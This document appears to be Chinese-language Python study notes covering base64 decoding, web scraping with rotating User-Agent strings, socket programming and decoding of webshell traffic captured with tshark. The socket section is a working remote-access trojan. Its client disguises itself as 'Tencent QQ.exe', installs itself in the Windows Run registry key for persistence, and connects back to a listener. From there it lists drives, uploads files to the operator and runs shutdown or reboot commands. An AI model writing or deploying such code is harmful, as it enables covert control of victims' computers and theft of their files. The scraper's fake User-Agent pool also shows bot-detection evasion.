包括四个项目(方面),一是base64解码py文件,二是网络爬虫py文件,三是socket编程,四是正则匹配(关联流量分析筛选)。
一 .base64解码py文件
import base64
import requests
# url=''
# img = requests.get(url).text
#img = img.replace('data:image/jpg;base64,','').replace('data:image/png;base64,','').replace('data:image/webp;base64,','')
with open('122.txt','r+') as f:
img = f.read()
#
lens = 4-len(img)%4
img += '='*lens
page_content = base64.b64decode(img)
print(page_content)
# file_path = './abc.jpg'
# with open(file_path,'wb') as f:
# f.write(page_content)
########
# #url编码
# from urllib.parse import quote,unquote
# print(quote('参数'))
# print(unquote('%E5%8F%82%E6%95%B0'))
二 .网络爬虫py文件
import requests
import random
url = 'https://www.baidu.com/'
####UserAgent池第一种方法
UAlist = [
'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36 Edg/129.0.0.0',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0'
'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1'
]
########
name = random.choice(UAlist)
print(name)
headers = {
'User-Agent': f'{name}'
}
response1 = requests.get(url,headers=headers)
# response2 = requests.get(url)
print(response1.content.decode())
# print(len(response1.content.decode()))
# print(response.request.headers)
# print(response.headers)
# print(response.request._cookies)
###UserAgent池第二种方法
from fake_useragent import UserAgent
name = UserAgent().random
print(name)
headers = {
'User-Agent': f'{name}'
}
response3 = requests.get(url,headers=headers)
print(response3.content.decode())
print(len(response3.content.decode()))
# 爬图片
url = 'https://s2.music.126.net/style/web2/img/coverall.png?e04e8f94201676f3dd9a654e60f9e5e7'
res1 = requests.get(url)
with open('网易云.png','wb') as f:
f.write(res1.content)
# 爬mv
url = 'https://vodkgeyttp8.vod.126.net/cloudmusic/83d1/core/4fd0/21664352decc901cbd99655066d83ecb.mp4?wsSecret=1eab8585b8740fa02ad40183f8e8e871&wsTime=1729415636'
res2 = requests.get(url,headers=headers)
with open('网易云.mp4','wb') as f:
f.write(res2.content)
# 百度贴吧面向对象
class Tieba:
def __init__(self):
self.url = 'https://tieba.baidu.com/f?'
self.headers={
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0'
}
def send(self,params):
res = requests.get(self.url, headers=self.headers)
return res.text
def save(self,page,con):
with open(f'{page}.html','w',encoding='utf-8') as f:
f.write(con)
def run(self):
word = input('请输入贴吧名字:')
pages = int(input('请输入要保存的页数:'))
for page in range(pages):
params = {
'kw': word,
'pn': page * 50
}
data = self.send(params)
self.save(page,data)
te = Tieba()
te.run()
三 .socket编程 py
server端
import os.path
import pickle
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('0.0.0.0',4321))
s.listen()
client,addr = s.accept()
print(addr,client)
# print('''
# +++控制台+++
# 输入1 关机
# 输入2 重启
# ''')
# shuru = input('请输入指令:>')
# client.send(shuru.encode())
#while True:
list_path = pickle.loads(client.recv(1024))
print(addr,list_path)
#client.send(command[0])
pwd = ''
while True:
command = input(f"{pwd}->").split(' ')
if command[0] == 'cd':
if len(command) == 1:
print(addr,list_path)
pwd = ''
else :
if pwd == '':
pwd = command[1]
else:
pwd = pwd + '\\' + command[1]
elif command[0] == 'dir':
path = ['dir',pwd]
client.send(pickle.dumps(path))
path_list = pickle.loads(client.recv(2048))
for list in path_list:
print(list)
elif command[0] == 'get':
file_list = ['get',pwd+command[1]]
client.send(pickle.dumps(file_list))
file_size = client.recv(1024).decode()
print(file_size)
sor_file = 0
with open(r'C:\Users\wzf20\Desktop\client.txt',"wb+") as file :
while sor_file < int(file_size):
data = client.recv(2048)
file.write(data)
sor_file = len(data)
elif command[0] == 'shutdown':
client.send(pickle.dumps(command))
if command[1] == '-s':
print("已执行远程系统关机\n")
elif command[1] == '-r':
print("已执行远程系统重启\n")
# elif command[0] == 'look':
# client.send(pickle.dumps(command))
# img_size = int(client.recv(2048).decode())
# print(img_size)
# client.send('ok'.encode())
#
# img_file = 0
# with open(f"{addr}".jpg,'wb') as file:
# while img_file < img_size:
# data = client.recv(2048)
# file.write(data)
# img_file = len(data)
#
client端
import os
import pickle
import shutil
import socket
import string
import winreg
from _socket import gethostname
#开机自启
#获取文件路径,复制文件
src_path = os.path.abspath(__file__)
shutil.copy(src_path,'C:\\Users\\Public\\Documents\\Tencent\\QQ\\Tencent QQ.exe')
#打开注册表需要的键
subkey = r'Software\\Microsoft\\Windows\\CurrentVersion\\Run'
hkey = winreg.OpenKey(winreg.HKEY_CURRENT_USER, subkey, 0, winreg.KEY_ALL_ACCESS)
#修改值,关闭hkey
winreg.SetValueEx(hkey,'TencentQQ_AutoLaught BDB21234c34',0,winreg.REG_SZ,'C:\\Users\\Public\\Documents\\QQ\\Tencent QQ.exe')
winreg.CloseKey(hkey)
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
client.connect(('192.168.1.205',4321))
#mess = c.recv(1024).decode('UTF-8')
# if mess == '1':
# os.system('shutdown -s -t 1')
# else:
# os.system('shutdown -r -t 1')
list_path = []
for c in string.ascii_uppercase:
if os.path.exists(c + ':'):
list_path.append(c + ':')
client.send(pickle.dumps(list_path))
class InmagGrab:
pass
while True:
command = pickle.loads(client.recv(2048))
print(command)
if command[0] == 'dir':
dir_list = os.listdir(command[1])
client.send(pickle.dumps(dir_list))
elif command[0] == 'get':
file_size = os.path.getsize(command[1])
client.send(str(file_size).encode())
with open(command[1],'rb') as file:
for inter in file:
client.send(inter)
elif command[0] == 'shutdown':
if command[1] == '-s':
os.system('shutdown -s')
else:
os.system('shutdown -r')
# elif commond[0] == 'look':
# img = InmagGrab.grab()
# img = img.resize((800,600))
# image = f"{gethostname()}".jpg
# img.save(image)
# img_size = os.path.getsize(image)
# client.send(str(img_size).encode())
# client.recv(1024).decode()
# with open(image,'rb') as file :
# for inter in file:
# client.send(inter)
四 .正则匹配(关联流量分析筛选)
import base64
import subprocess
import json
from urllib.parse import unquote
#
# command = ('tshark -r tmpshell.pcapng -Y "http" -T json -e "http.file_data" > 1.json')
# proc = subprocess.Popen(command,shell=True)
# proc.communicate()
with open("1.json","r") as f:
data = json.load(f)
a=[]
for i in data:
try:
a.append(i["_source"]["layers"]["http.file_data"][0])
except:
continue
for i in a:
try:
b1 = base64.b16decode(i.upper())
b2 = base64.b64decode(b1)
b3 = b2[::-1]
print(b3.decode())
except:
print(i)